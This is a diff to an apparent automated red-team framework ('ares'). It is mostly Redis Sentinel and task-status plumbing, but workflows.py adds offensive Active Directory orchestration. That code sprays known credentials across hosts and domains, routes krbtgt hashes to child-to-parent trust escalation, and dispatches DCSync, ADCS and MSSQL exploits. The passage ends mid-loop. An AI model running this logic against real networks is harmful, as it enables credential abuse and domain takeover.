+"""Redis client helpers, including optional Sentinel support."""
+
+from __future__ import annotations
+
+import os
+from typing import Any
+
+from loguru import logger
+
+from ares.core.config import get_redis_url
+
+
+def _parse_int(value: str | None, default: int) -> int:
+    if not value:
+        return default
+    try:
+        return int(value)
+    except ValueError:
+        return default
+
+
+def _parse_optional_float(value: str | None, default: float | None) -> float | None:
+    if value is None or value == "":
+        return default
+    if value.lower() == "none":
+        return None
+    try:
+        return float(value)
+    except ValueError:
+        return default
+
+
+def get_redis_sentinel_config() -> dict[str, Any] | None:
+    """Return Sentinel config from env, or None when not configured."""
+    host = os.getenv("REDIS_SENTINEL_HOST")
+    master = os.getenv("REDIS_SENTINEL_MASTER")
+    if not host or not master:
+        return None
+
+    port = _parse_int(os.getenv("REDIS_SENTINEL_PORT"), 26379)
+    sentinel_password = os.getenv("REDIS_SENTINEL_PASSWORD") or os.getenv("REDIS_PASSWORD")
+    redis_password = os.getenv("REDIS_PASSWORD") or sentinel_password
+    db = _parse_int(os.getenv("REDIS_DB"), 0)
+
+    return {
+        "host": host,
+        "port": port,
+        "master": master,
+        "sentinel_password": sentinel_password,
+        "redis_password": redis_password,
+        "db": db,
+    }
+
+
+async def create_redis_client(redis_url: str | None = None, *, decode_responses: bool = False):
+    """Create a Redis client, using Sentinel if configured."""
+    try:
+        import redis.asyncio as redis_async
+    except ImportError as e:
+        raise RuntimeError("redis package required: pip install redis") from e
+
+    sentinel = get_redis_sentinel_config()
+    default_socket_timeout = None if sentinel else 30.0
+    socket_timeout = _parse_optional_float(
+        os.getenv("REDIS_SOCKET_TIMEOUT"), default_socket_timeout
+    )
+    socket_connect_timeout = _parse_optional_float(os.getenv("REDIS_SOCKET_CONNECT_TIMEOUT"), 5.0)
+    health_check_interval = _parse_optional_float(os.getenv("REDIS_HEALTH_CHECK_INTERVAL"), 10.0)
+    logger.debug(
+        "Redis client config: socket_timeout={}, connect_timeout={}, health_check={}",
+        socket_timeout,
+        socket_connect_timeout,
+        health_check_interval,
+    )
+    if sentinel:
+        logger.info(
+            "Connecting to Redis via Sentinel {}:{} (master: {})",
+            sentinel["host"],
+            sentinel["port"],
+            sentinel["master"],
+        )
+        sentinel_client = redis_async.Sentinel(
+            [(sentinel["host"], sentinel["port"])],
+            password=sentinel["sentinel_password"],
+            socket_timeout=socket_timeout,
+            socket_connect_timeout=socket_connect_timeout,
+            health_check_interval=health_check_interval,
+            decode_responses=decode_responses,
+        )
+        return sentinel_client.master_for(
+            sentinel["master"],
+            password=sentinel["redis_password"],
+            db=sentinel["db"],
+            decode_responses=decode_responses,
+            socket_timeout=socket_timeout,
+            socket_connect_timeout=socket_connect_timeout,
+            health_check_interval=health_check_interval,
+        )
+
+    return redis_async.from_url(
+        redis_url or get_redis_url(),
+        decode_responses=decode_responses,
+        socket_timeout=socket_timeout,
+        socket_connect_timeout=socket_connect_timeout,
+        health_check_interval=health_check_interval,
+    )

--- a/src/ares/core/task_queue.py
+++ b/src/ares/core/task_queue.py
@@ -88,6 +88,8 @@ class RedisTaskQueue:
     TASK_QUEUE_PREFIX = "ares:tasks"
     RESULT_QUEUE_PREFIX = "ares:results"
     HEARTBEAT_PREFIX = "ares:heartbeat"
+    TASK_STATUS_PREFIX = "ares:task_status"
+    TASK_STATUS_TTL = 60 * 60 * 24  # 24 hours
     LOCK_PREFIX = "ares:lock"
 
     # TTLs
@@ -156,6 +158,10 @@ class RedisTaskQueue:
     def _heartbeat_key(self, agent_name: str) -> str:
         """Get heartbeat key for an agent."""
         return f"{self.HEARTBEAT_PREFIX}:{agent_name}"
+
+    def _task_status_key(self, task_id: str) -> str:
+        """Get task status key for a task."""
+        return f"{self.TASK_STATUS_PREFIX}:{task_id}"
 
     # === Orchestrator Methods ===
 
@@ -414,6 +420,8 @@ class RedisTaskQueue:
         status: str = "idle",
         current_task: str | None = None,
         pod_name: str | None = None,
+        role: str | None = None,
+        operation_id: str | None = None,
     ) -> None:
         """
         Send agent heartbeat.
@@ -436,12 +444,46 @@ class RedisTaskQueue:
                 "status": status,
                 "current_task": current_task,
                 "pod_name": pod_name,
+                "role": role,
+                "operation_id": operation_id,
                 "timestamp": datetime.now(timezone.utc).isoformat(),
             }
         )
 
         try:
             await self._client.set(heartbeat_key, data, ex=self.HEARTBEAT_TTL)
+        except Exception as e:
+            error_str = str(e).lower()
+            if any(
+                keyword in error_str
+                for keyword in [
+                    "connection",
+                    "connect",
+                    "closed",
+                    "timeout",
+                    "broken pipe",
+                    "reset",
+                ]
+            ):
+                self._handle_connection_error(e)
+            raise
+
+    async def set_task_status(
+        self,
+        task_id: str,
+        status: str,
+        **fields: Any,
+    ) -> None:
+        """Persist task status with a TTL for debugging/insight."""
+        if not self._connected:
+            await self.connect()
+
+        data = {"status": status, "updated_at": datetime.now(timezone.utc).isoformat()}
+        data.update(fields)
+        key = self._task_status_key(task_id)
+
+        try:
+            await self._client.set(key, json.dumps(data, default=str), ex=self.TASK_STATUS_TTL)
         except Exception as e:
             error_str = str(e).lower()
             if any(

--- a/src/ares/core/task_queue.py
+++ b/src/ares/core/task_queue.py
@@ -14,6 +14,7 @@ from loguru import logger
 from pydantic import BaseModel
 
 from ares.core.config import get_redis_url
+from ares.core.redis_client import create_redis_client, get_redis_sentinel_config
 
 
 class TaskMessage(BaseModel):
@@ -110,18 +111,17 @@ class RedisTaskQueue:
             return
 
         try:
-            import redis.asyncio as redis
-
-            self._client = redis.from_url(
+            self._client = await create_redis_client(
                 self.redis_url,
                 decode_responses=True,  # Auto-decode to strings
             )
             await self._client.ping()
             self._connected = True
-            logger.info(f"TaskQueue connected to Redis at {self.redis_url}")
+            if get_redis_sentinel_config():
+                logger.info("TaskQueue connected to Redis via Sentinel")
+            else:
+                logger.info(f"TaskQueue connected to Redis at {self.redis_url}")
 
-        except ImportError as e:
-            raise RuntimeError("redis package required: pip install redis") from e
         except Exception as e:
             raise RuntimeError(f"Failed to connect to Redis: {e}") from e
 

--- a/src/ares/core/worker.py
+++ b/src/ares/core/worker.py
@@ -629,6 +629,22 @@ class RedisWorkerAgent:
     async def _process_task(self, task: TaskMessage) -> None:  # noqa: PLR0912
         """Process a task from the Redis queue."""
         self._current_task = task.task_id
+        started_at = datetime.now(timezone.utc).isoformat()
+        payload_snapshot = task.payload
+        try:
+            await self.task_queue.set_task_status(
+                task_id=task.task_id,
+                status="running",
+                operation_id=self.operation_id,
+                role=self.role.value,
+                agent_name=self.agent_name,
+                pod_name=self.pod_name,
+                task_type=task.task_type,
+                payload=payload_snapshot,
+                started_at=started_at,
+            )
+        except Exception as e:
+            logger.warning(f"[{self.agent_name}] Failed to record task status: {e}")
         logger.info(f"[{self.agent_name}] Processing task {task.task_id}")
 
         try:
@@ -682,6 +698,20 @@ class RedisWorkerAgent:
                     error=agent_error,
                     worker_pod=self.pod_name,
                 )
+                try:
+                    await self.task_queue.set_task_status(
+                        task_id=task.task_id,
+                        status="failed",
+                        operation_id=self.operation_id,
+                        role=self.role.value,
+                        agent_name=self.agent_name,
+                        pod_name=self.pod_name,
+                        task_type=task.task_type,
+                        ended_at=datetime.now(timezone.utc).isoformat(),
+                        error=agent_error,
+                    )
+                except Exception as e:
+                    logger.warning(f"[{self.agent_name}] Failed to record task status: {e}")
                 logger.error(f"[{self.agent_name}] Task {task.task_id} failed: {agent_error}")
                 return
 
@@ -692,6 +722,19 @@ class RedisWorkerAgent:
                 result=result_payload,
                 worker_pod=self.pod_name,
             )
+            try:
+                await self.task_queue.set_task_status(
+                    task_id=task.task_id,
+                    status="completed",
+                    operation_id=self.operation_id,
+                    role=self.role.value,
+                    agent_name=self.agent_name,
+                    pod_name=self.pod_name,
+                    task_type=task.task_type,
+                    ended_at=datetime.now(timezone.utc).isoformat(),
+                )
+            except Exception as e:
+                logger.warning(f"[{self.agent_name}] Failed to record task status: {e}")
             self._tasks_completed += 1
             logger.success(f"[{self.agent_name}] Task {task.task_id} completed")
 
@@ -707,6 +750,17 @@ class RedisWorkerAgent:
                     success=False,
                     error=f"FATAL: {type(e).__name__}: {e!s}",
                     worker_pod=self.pod_name,
+                )
+                await self.task_queue.set_task_status(
+                    task_id=task.task_id,
+                    status="failed",
+                    operation_id=self.operation_id,
+                    role=self.role.value,
+                    agent_name=self.agent_name,
+                    pod_name=self.pod_name,
+                    task_type=task.task_type,
+                    ended_at=datetime.now(timezone.utc).isoformat(),
+                    error=str(e),
                 )
             except Exception as send_error:
                 logger.error(
@@ -728,6 +782,20 @@ class RedisWorkerAgent:
                 error=f"{type(e).__name__}: {e!s}",
                 worker_pod=self.pod_name,
             )
+            try:
+                await self.task_queue.set_task_status(
+                    task_id=task.task_id,
+                    status="failed",
+                    operation_id=self.operation_id,
+                    role=self.role.value,
+                    agent_name=self.agent_name,
+                    pod_name=self.pod_name,
+                    task_type=task.task_type,
+                    ended_at=datetime.now(timezone.utc).isoformat(),
+                    error=str(e),
+                )
+            except Exception as status_error:
+                logger.warning(f"[{self.agent_name}] Failed to record task status: {status_error}")
         finally:
             self._current_task = None
 
@@ -780,6 +848,19 @@ class RedisWorkerAgent:
                 },
                 worker_pod=self.pod_name,
             )
+            try:
+                await self.task_queue.set_task_status(
+                    task_id=task.task_id,
+                    status="completed",
+                    operation_id=self.operation_id,
+                    role=self.role.value,
+                    agent_name=self.agent_name,
+                    pod_name=self.pod_name,
+                    task_type=task.task_type,
+                    ended_at=datetime.now(timezone.utc).isoformat(),
+                )
+            except Exception as e:
+                logger.warning(f"[{self.agent_name}] Failed to record task status: {e}")
             self._tasks_completed += 1
             logger.success(f"[{self.agent_name}] Command completed: exit code {result.returncode}")
 
@@ -790,6 +871,20 @@ class RedisWorkerAgent:
                 error=f"Command timed out after {timeout}s",
                 worker_pod=self.pod_name,
             )
+            try:
+                await self.task_queue.set_task_status(
+                    task_id=task.task_id,
+                    status="failed",
+                    operation_id=self.operation_id,
+                    role=self.role.value,
+                    agent_name=self.agent_name,
+                    pod_name=self.pod_name,
+                    task_type=task.task_type,
+                    ended_at=datetime.now(timezone.utc).isoformat(),
+                    error=f"Command timed out after {timeout}s",
+                )
+            except Exception as e:
+                logger.warning(f"[{self.agent_name}] Failed to record task status: {e}")
         except Exception as e:
             logger.error(f"Command execution failed: {e}")
             await self.task_queue.send_result(
@@ -798,6 +893,20 @@ class RedisWorkerAgent:
                 error=str(e),
                 worker_pod=self.pod_name,
             )
+            try:
+                await self.task_queue.set_task_status(
+                    task_id=task.task_id,
+                    status="failed",
+                    operation_id=self.operation_id,
+                    role=self.role.value,
+                    agent_name=self.agent_name,
+                    pod_name=self.pod_name,
+                    task_type=task.task_type,
+                    ended_at=datetime.now(timezone.utc).isoformat(),
+                    error=str(e),
+                )
+            except Exception as status_error:
+                logger.warning(f"[{self.agent_name}] Failed to record task status: {status_error}")
 
     def _extract_result(self, result: Any) -> str:
         """Extract text result from agent output."""
@@ -838,6 +947,8 @@ class RedisWorkerAgent:
                     status=status,
                     current_task=self._current_task,
                     pod_name=self.pod_name,
+                    role=self.role.value,
+                    operation_id=self.operation_id,
                 )
                 # Reset retry delay on success
                 retry_delay = 1.0

--- a/src/ares/core/worker.py
+++ b/src/ares/core/worker.py
@@ -33,6 +33,7 @@ from ares.core.messages import (
     OperationComplete,
 )
 from ares.core.models import AgentRole
+from ares.core.redis_client import create_redis_client
 from ares.core.task_queue import RedisTaskQueue, TaskMessage
 from ares.tools.red import CrackerCallbackTools, LateralCallbackTools
 
@@ -67,12 +68,6 @@ async def discover_active_operation(  # noqa: PLR0912
     Raises:
         asyncio.CancelledError: Re-raised after cleanup when the task is cancelled
     """
-    try:
-        import redis.asyncio as redis_async
-    except ImportError:
-        logger.error("redis package not installed, cannot discover operations")
-        return None
-
     start_time = time.monotonic()
     last_log_time = start_time
     consecutive_errors = 0
@@ -93,16 +88,52 @@ async def discover_active_operation(  # noqa: PLR0912
             try:
                 # Reuse existing connection or create new one
                 if client is None:
-                    client = redis_async.from_url(redis_url)
+                    client = await create_redis_client(
+                        redis_url,
+                        decode_responses=True,
+                    )
                 await client.ping()
 
                 now = datetime.now(timezone.utc)
+
+                # Honor explicit operation pointer before scanning checkpoints.
+                active_key = await client.get("ares:operation:active")
+                if active_key:
+                    active_op_id = str(active_key)
+                    state_key = f"ares:operation:{active_op_id}:state"
+                    if await client.exists(state_key):
+                        time_key = f"ares:operation:{active_op_id}:checkpoint_time"
+                        checkpoint_data = await client.get(time_key)
+                        if checkpoint_data:
+                            checkpoint_time = datetime.fromisoformat(str(checkpoint_data))
+                            if checkpoint_time.tzinfo is None:
+                                checkpoint_time = checkpoint_time.replace(tzinfo=timezone.utc)
+                            age_seconds = (now - checkpoint_time).total_seconds()
+                            if age_seconds <= max_operation_age:
+                                logger.info(
+                                    f"Discovered active operation via pointer: {active_op_id}"
+                                )
+                                await _cleanup_client()
+                                return active_op_id
+                            logger.debug(
+                                f"Ignoring stale pointed operation {active_op_id} "
+                                f"(checkpoint age: {age_seconds:.0f}s > "
+                                f"{max_operation_age}s)"
+                            )
+                        else:
+                            logger.debug(
+                                f"Active operation pointer has no checkpoint yet: {active_op_id}"
+                            )
+                    else:
+                        logger.debug(
+                            f"Active operation pointer references missing state: {active_op_id}"
+                        )
 
                 # Scan for operation state keys
                 operations: list[tuple[str, datetime]] = []
                 async for key in client.scan_iter("ares:operation:*:state"):
                     # Extract operation ID from key: ares:operation:<op_id>:state
-                    parts = key.decode().split(":")
+                    parts = str(key).split(":")
                     if len(parts) >= 3:
                         op_id = parts[2]
 
@@ -111,7 +142,7 @@ async def discover_active_operation(  # noqa: PLR0912
                         checkpoint_data = await client.get(time_key)
 
                         if checkpoint_data:
-                            checkpoint_time = datetime.fromisoformat(checkpoint_data.decode())
+                            checkpoint_time = datetime.fromisoformat(str(checkpoint_data))
                             # Ensure checkpoint_time is timezone-aware for comparison
                             if checkpoint_time.tzinfo is None:
                                 checkpoint_time = checkpoint_time.replace(tzinfo=timezone.utc)
@@ -165,6 +196,16 @@ async def discover_active_operation(  # noqa: PLR0912
                 # Close broken connection so we reconnect next iteration
                 await _cleanup_client()
 
+                # If Redis isn't available at all, don't spin forever.
+                if isinstance(e, RuntimeError) and "redis package required" in str(e):
+                    logger.error("redis package not installed, cannot discover operations")
+                    return None
+
+                # Respect max_wait even when errors occur.
+                if max_wait is not None and (time.monotonic() - start_time) >= max_wait:
+                    logger.warning(f"No active operations found after {max_wait}s")
+                    return None
+
                 # Exponential backoff with jitter, capped at 60s
                 backoff = min(5 * (2 ** (consecutive_errors - 1)), 60)
                 jitter = random.uniform(0, 1)  # nosec B311 # noqa: S311 - jitter for backoff
@@ -177,13 +218,7 @@ async def discover_active_operation(  # noqa: PLR0912
 
 async def get_operation_model(redis_url: str, operation_id: str) -> str | None:
     """Fetch the model configured for a specific operation from Redis."""
-    try:
-        import redis.asyncio as redis_async
-    except ImportError:
-        logger.error("redis package not installed, cannot resolve operation model")
-        return None
-
-    client = redis_async.from_url(redis_url, decode_responses=True)
+    client = await create_redis_client(redis_url, decode_responses=True)
     try:
         return await client.get(f"ares:operation:{operation_id}:model")
     except Exception as e:
@@ -198,13 +233,7 @@ async def get_operation_model(redis_url: str, operation_id: str) -> str | None:
 
 async def get_operation_model_overrides(redis_url: str, operation_id: str) -> dict[str, str] | None:
     """Fetch model override env vars for a specific operation from Redis."""
-    try:
-        import redis.asyncio as redis_async
-    except ImportError:
-        logger.error("redis package not installed, cannot resolve operation model overrides")
-        return None
-
-    client = redis_async.from_url(redis_url, decode_responses=True)
+    client = await create_redis_client(redis_url, decode_responses=True)
     try:
         raw = await client.get(f"ares:operation:{operation_id}:model_overrides")
         if not raw:
@@ -216,6 +245,38 @@ async def get_operation_model_overrides(redis_url: str, operation_id: str) -> di
         return None
     except Exception as e:
         logger.warning(f"Failed to read model overrides for {operation_id}: {e}")
+        return None
+    finally:
+        try:
+            await client.aclose()
+        except Exception:
+            pass
+
+
+async def get_active_operation_pointer(redis_url: str, max_operation_age: int = 300) -> str | None:
+    """Fetch a valid active operation pointer from Redis, if present."""
+    client = await create_redis_client(redis_url, decode_responses=True)
+    try:
+        active_key = await client.get("ares:operation:active")
+        if not active_key:
+            return None
+        op_id = str(active_key)
+        state_key = f"ares:operation:{op_id}:state"
+        if not await client.exists(state_key):
+            return None
+        time_key = f"ares:operation:{op_id}:checkpoint_time"
+        checkpoint_data = await client.get(time_key)
+        if not checkpoint_data:
+            return op_id
+        checkpoint_time = datetime.fromisoformat(str(checkpoint_data))
+        if checkpoint_time.tzinfo is None:
+            checkpoint_time = checkpoint_time.replace(tzinfo=timezone.utc)
+        age_seconds = (datetime.now(timezone.utc) - checkpoint_time).total_seconds()
+        if age_seconds <= max_operation_age:
+            return op_id
+        return None
+    except Exception as e:
+        logger.warning(f"Failed to read active operation pointer: {e}")
         return None
     finally:
         try:
@@ -444,12 +505,20 @@ class RedisWorkerAgent:
         agent: Agent,
         agent_name: str,
         pod_name: str | None = None,
+        operation_id: str | None = None,
+        redis_url: str | None = None,
+        pointer_check_interval: float = 30.0,
+        max_operation_age: int = 300,
     ):
         self.role = role
         self.task_queue = task_queue
         self.agent = agent
         self.agent_name = agent_name
         self.pod_name = pod_name or os.environ.get("HOSTNAME", "unknown")
+        self.operation_id = operation_id
+        self.redis_url = redis_url
+        self.pointer_check_interval = pointer_check_interval
+        self.max_operation_age = max_operation_age
         self._running = False
         self._current_task: str | None = None
         self._tasks_completed = 0
@@ -484,9 +553,20 @@ class RedisWorkerAgent:
         # Exponential backoff for connection errors
         retry_delay = 1.0  # Start with 1 second
         max_retry_delay = 60.0  # Cap at 60 seconds
+        last_pointer_check = time.monotonic()
 
         while self._running:
             try:
+                if (
+                    self.redis_url
+                    and self.operation_id
+                    and self.pointer_check_interval > 0
+                    and (time.monotonic() - last_pointer_check) >= self.pointer_check_interval
+                ):
+                    last_pointer_check = time.monotonic()
+                    if await self._check_for_pointer_switch():
+                        return
+
                 # Poll Redis queue (blocks up to 5 seconds)
                 task = await self.task_queue.poll_task(
                     role=self.role.value,
@@ -651,6 +731,22 @@ class RedisWorkerAgent:
         finally:
             self._current_task = None
 
+    async def _check_for_pointer_switch(self) -> bool:
+        """Return True if a switch is requested and the worker should exit."""
+        if not self.redis_url or not self.operation_id:
+            return False
+        active_op = await get_active_operation_pointer(
+            self.redis_url, max_operation_age=self.max_operation_age
+        )
+        if not active_op or active_op == self.operation_id:
+            return False
+        logger.warning(
+            "Active operation pointer changed from "
+            f"{self.operation_id} to {active_op}; shutting down to reattach"
+        )
+        self._running = False
+        return True
+
     async def _execute_command_task(self, task: TaskMessage) -> None:
         """Execute a command task locally."""
         import subprocess
@@ -786,11 +882,19 @@ class WorkerAgent:
         dispatcher: RedTeamDispatcher,
         agent: Agent,
         agent_name: str,
+        operation_id: str | None = None,
+        redis_url: str | None = None,
+        pointer_check_interval: float = 30.0,
+        max_operation_age: int = 300,
     ):
         self.role = role
         self.dispatcher = dispatcher
         self.agent = agent
         self.agent_name = agent_name
+        self.operation_id = operation_id
+        self.redis_url = redis_url
+        self.pointer_check_interval = pointer_check_interval
+        self.max_operation_age = max_operation_age
         self._running = False
         self._current_task: str | None = None
         self._tasks_completed = 0
@@ -821,9 +925,20 @@ class WorkerAgent:
     async def _worker_loop(self) -> None:
         """Main worker loop - poll for messages and process tasks."""
         logger.info(f"Worker {self.agent_name} entering main loop")
+        last_pointer_check = time.monotonic()
 
         while self._running:
             try:
+                if (
+                    self.redis_url
+                    and self.operation_id
+                    and self.pointer_check_interval > 0
+                    and (time.monotonic() - last_pointer_check) >= self.pointer_check_interval
+                ):
+                    last_pointer_check = time.monotonic()
+                    if await self._check_for_pointer_switch():
+                        return
+
                 # Poll for messages
                 messages = await self.dispatcher.get_messages(self.agent_name, timeout=1.0)
 
@@ -838,6 +953,22 @@ class WorkerAgent:
             except Exception as e:
                 logger.error(f"Worker loop error: {e}")
                 await asyncio.sleep(5)  # Back off on error
+
+    async def _check_for_pointer_switch(self) -> bool:
+        """Return True if a switch is requested and the worker should exit."""
+        if not self.redis_url or not self.operation_id:
+            return False
+        active_op = await get_active_operation_pointer(
+            self.redis_url, max_operation_age=self.max_operation_age
+        )
+        if not active_op or active_op == self.operation_id:
+            return False
+        logger.warning(
+            "Active operation pointer changed from "
+            f"{self.operation_id} to {active_op}; shutting down to reattach"
+        )
+        self._running = False
+        return True
 
     async def _handle_message(self, msg: AgentMessage) -> None:
         """Handle an incoming message."""
@@ -1079,6 +1210,15 @@ async def run_worker(  # noqa: PLR0912
     logger.info(f"Starting {role.value} worker for operation {operation_id}")
     logger.info(f"Pod: {pod_name}, Redis: {redis_url}, Redis Queue: {use_redis_queue}")
 
+    try:
+        pointer_check_interval = float(os.getenv("ARES_OPERATION_POINTER_REFRESH_SECONDS", "30"))
+    except ValueError:
+        pointer_check_interval = 30.0
+    try:
+        max_operation_age = int(os.getenv("ARES_OPERATION_POINTER_MAX_AGE", "300"))
+    except ValueError:
+        max_operation_age = 300
+
     # Create Redis task queue for direct polling (Kubernetes mode)
     task_queue: RedisTaskQueue | None = None
     if use_redis_queue:
@@ -1133,6 +1273,10 @@ async def run_worker(  # noqa: PLR0912
                 agent=agent,
                 agent_name=agent_info.name,
                 pod_name=pod_name,
+                operation_id=operation_id,
+                redis_url=redis_url,
+                pointer_check_interval=pointer_check_interval,
+                max_operation_age=max_operation_age,
             )
             logger.info(f"Starting Redis worker for role {role.value}")
         else:
@@ -1142,6 +1286,10 @@ async def run_worker(  # noqa: PLR0912
                 dispatcher=dispatcher,
                 agent=agent,
                 agent_name=agent_info.name,
+                operation_id=operation_id,
+                redis_url=redis_url,
+                pointer_check_interval=pointer_check_interval,
+                max_operation_age=max_operation_age,
             )
             logger.info(f"Starting dispatcher worker for role {role.value}")
 

--- a/src/ares/core/workflows.py
+++ b/src/ares/core/workflows.py
@@ -84,6 +84,35 @@ def _has_admin_access(state: SharedRedTeamState, host: Host) -> bool:
     return False
 
 
+def _collect_candidate_domains(state: SharedRedTeamState) -> set[str]:
+    domains: set[str] = set()
+    if state.target and state.target.domain:
+        domains.add(state.target.domain)
+    for cred in state.all_credentials:
+        if cred.domain:
+            domains.add(cred.domain)
+    for user in state.all_users:
+        if user.domain:
+            domains.add(user.domain)
+    return domains
+
+
+def _select_domain_credential(state: SharedRedTeamState, domain: str) -> Credential | None:
+    admin_first = [c for c in state.all_credentials if c.domain == domain and c.password]
+    for cred in admin_first:
+        if cred.is_admin:
+            return cred
+    return admin_first[0] if admin_first else None
+
+
+def _is_child_domain(child_domain: str, parent_domain: str) -> bool:
+    if not child_domain or not parent_domain:
+        return False
+    if child_domain == parent_domain:
+        return False
+    return child_domain.endswith(f".{parent_domain}")
+
+
 async def credential_expansion_loop(
     dispatcher: RedTeamDispatcher,
     max_iterations: int = 10,
@@ -109,6 +138,8 @@ async def credential_expansion_loop(
         CredentialTestingTracker with test results
     """
     tracker = CredentialTestingTracker()
+    from ares.core.models import Credential as RuntimeCredential
+
     iterations = 0
 
     logger.info("Starting credential expansion loop")
@@ -118,6 +149,7 @@ async def credential_expansion_loop(
 
         credentials = state.all_credentials
         hosts = state.all_hosts
+        candidate_domains = _collect_candidate_domains(state)
         new_tests = 0
         tasks_dispatched: list[str] = []
 
@@ -126,35 +158,52 @@ async def credential_expansion_loop(
         )
 
         for cred in credentials:
+            domain_variants = {cred.domain} if cred.domain else set()
+            if cred.password:
+                domain_variants.update(candidate_domains)
+            domain_variants = {d for d in domain_variants if d}
+
             for host in hosts:
-                if tracker.has_tested(cred, host):
-                    continue
-
-                # Skip if we already have admin access on this host
-                if _has_admin_access(state, host):
-                    tracker.mark_tested(cred, host, success=True)
-                    continue
-
-                # Dispatch lateral movement test
-                task_id = await dispatcher.request_lateral_movement(
-                    target_host=host.ip,
-                    username=cred.username,
-                    source_agent="orchestrator",
-                    password=cred.password if cred.password else None,
-                    domain=cred.domain,
-                )
-
-                if task_id:
-                    tasks_dispatched.append(task_id)
-                    new_tests += 1
-                    logger.debug(
-                        f"Dispatched lateral test: {cred.domain}\\{cred.username} -> {host.ip}"
+                for domain_override in domain_variants:
+                    test_cred = RuntimeCredential(
+                        username=cred.username,
+                        password=cred.password,
+                        domain=domain_override,
+                        source=cred.source,
+                        is_admin=cred.is_admin,
                     )
 
-                tracker.mark_tested(cred, host)
+                    if tracker.has_tested(test_cred, host):
+                        continue
 
-                # Small delay to avoid overwhelming
-                await asyncio.sleep(delay_between_tests)
+                    # Skip if we already have admin access on this host
+                    if _has_admin_access(state, host):
+                        tracker.mark_tested(test_cred, host, success=True)
+                        continue
+
+                    # Dispatch lateral movement test
+                    task_id = await dispatcher.request_lateral_movement(
+                        target_host=host.ip,
+                        username=cred.username,
+                        source_agent="orchestrator",
+                        password=cred.password if cred.password else None,
+                        domain=domain_override,
+                    )
+
+                    if task_id:
+                        tasks_dispatched.append(task_id)
+                        new_tests += 1
+                        logger.debug(
+                            "Dispatched lateral test: %s\\%s -> %s",
+                            domain_override,
+                            cred.username,
+                            host.ip,
+                        )
+
+                    tracker.mark_tested(test_cred, host)
+
+                    # Small delay to avoid overwhelming
+                    await asyncio.sleep(delay_between_tests)
 
         if new_tests == 0:
             logger.info("No new credential/host combinations to test")
@@ -284,6 +333,75 @@ async def exploitation_workflow(
     }
 
 
+async def _dispatch_exploit(
+    dispatcher: RedTeamDispatcher,
+    vuln_type: str,
+    vuln_id: str,
+    target: str,
+    details: dict[str, Any],
+) -> str:
+    return await dispatcher.request_exploit(
+        vuln_type=vuln_type,
+        vuln_id=vuln_id,
+        target=target,
+        source_agent="orchestrator",
+        params=details,
+    )
+
+
+async def _dispatch_acl(dispatcher: RedTeamDispatcher, details: dict[str, Any]) -> str:
+    return await dispatcher.request_acl_analysis(
+        target_user=details.get("target_user", ""),
+        domain=details.get("domain", ""),
+        source_agent="orchestrator",
+        find_path_to=details.get("find_path_to", "Domain Admins"),
+    )
+
+
+async def _dispatch_krbtgt(
+    dispatcher: RedTeamDispatcher,
+    vuln: dict[str, Any],
+    target: str,
+    details: dict[str, Any],
+) -> str:
+    krbtgt_domain = details.get("domain", "")
+    parent_domain = (
+        dispatcher.shared_state.target.domain
+        if dispatcher.shared_state.target and dispatcher.shared_state.target.domain
+        else ""
+    )
+    if _is_child_domain(krbtgt_domain, parent_domain):
+        credential = _select_domain_credential(dispatcher.shared_state, krbtgt_domain)
+        if credential:
+            task_id = await dispatcher.request_exploit(
+                vuln_type="trust_raise_child",
+                vuln_id=vuln["id"],
+                target=target,
+                source_agent="orchestrator",
+                params={
+                    "child_domain": krbtgt_domain,
+                    "target_domain": parent_domain,
+                    "username": credential.username,
+                    "password": credential.password,
+                },
+            )
+            if task_id:
+                return task_id
+        else:
+            logger.warning(
+                "krbtgt hash found for %s but no credential available for raise_child",
+                krbtgt_domain,
+            )
+
+    return await dispatcher.request_lateral_movement(
+        target_host=target,
+        username="Administrator",
+        source_agent="orchestrator",
+        hash_value=details.get("hash_value", ""),
+        domain=krbtgt_domain,
+    )
+
+
 async def _exploit_vulnerability(
     dispatcher: RedTeamDispatcher,
     vuln: dict[str, Any],
@@ -303,77 +421,30 @@ async def _exploit_vulnerability(
     target = vuln["target"]
     details = vuln.get("details", {})
 
+    async def dispatch_exploit() -> str:
+        return await _dispatch_exploit(dispatcher, vuln_type, vuln["id"], target, details)
+
+    async def dispatch_acl() -> str:
+        return await _dispatch_acl(dispatcher, details)
+
+    async def dispatch_krbtgt() -> str:
+        return await _dispatch_krbtgt(dispatcher, vuln, target, details)
+
+    routes = [
+        (lambda: vuln_type.startswith("ADCS_"), dispatch_exploit),
+        (lambda: vuln_type == "acl_abuse", dispatch_acl),
+        (lambda: "delegation" in vuln_type.lower(), dispatch_exploit),
+        (lambda: vuln_type == "krbtgt_hash", dispatch_krbtgt),
+        (lambda: vuln_type == "dcsync", dispatch_exploit),
+        (lambda: vuln_type.startswith("mssql_"), dispatch_exploit),
+        (lambda: True, dispatch_exploit),
+    ]
+
     task_id = ""
-
-    # Route based on vulnerability type
-    if vuln_type.startswith("ADCS_"):
-        # Route to PrivEsc agent
-        task_id = await dispatcher.request_exploit(
-            vuln_type=vuln_type,
-            vuln_id=vuln["id"],
-            target=target,
-            source_agent="orchestrator",
-            params=details,
-        )
-
-    elif vuln_type == "acl_abuse":
-        # Route to ACL agent
-        task_id = await dispatcher.request_acl_analysis(
-            target_user=details.get("target_user", ""),
-            domain=details.get("domain", ""),
-            source_agent="orchestrator",
-            find_path_to=details.get("find_path_to", "Domain Admins"),
-        )
-
-    elif "delegation" in vuln_type.lower():
-        # Route to PrivEsc agent for delegation attacks
-        task_id = await dispatcher.request_exploit(
-            vuln_type=vuln_type,
-            vuln_id=vuln["id"],
-            target=target,
-            source_agent="orchestrator",
-            params=details,
-        )
-
-    elif vuln_type == "krbtgt_hash":
-        # Golden ticket - route to lateral agent
-        task_id = await dispatcher.request_lateral_movement(
-            target_host=target,
-            username="Administrator",
-            source_agent="orchestrator",
-            hash_value=details.get("hash_value", ""),
-            domain=details.get("domain", ""),
-        )
-
-    elif vuln_type == "dcsync":
-        # DCSync - route to privesc agent
-        task_id = await dispatcher.request_exploit(
-            vuln_type=vuln_type,
-            vuln_id=vuln["id"],
-            target=target,
-            source_agent="orchestrator",
-            params=details,
-        )
-
-    elif vuln_type.startswith("mssql_"):
-        # MSSQL attacks - route to privesc agent
-        task_id = await dispatcher.request_exploit(
-            vuln_type=vuln_type,
-            vuln_id=vuln["id"],
-            target=target,
-            source_agent="orchestrator",
-            params=details,
-        )
-
-    else:
-        # Default: route to privesc agent
-        task_id = await dispatcher.request_exploit(
-            vuln_type=vuln_type,
-            vuln_id=vuln["id"],
-            target=target,
-            source_agent="orchestrator",
-            params=details,
-        )
+    for predicate, handler in routes:
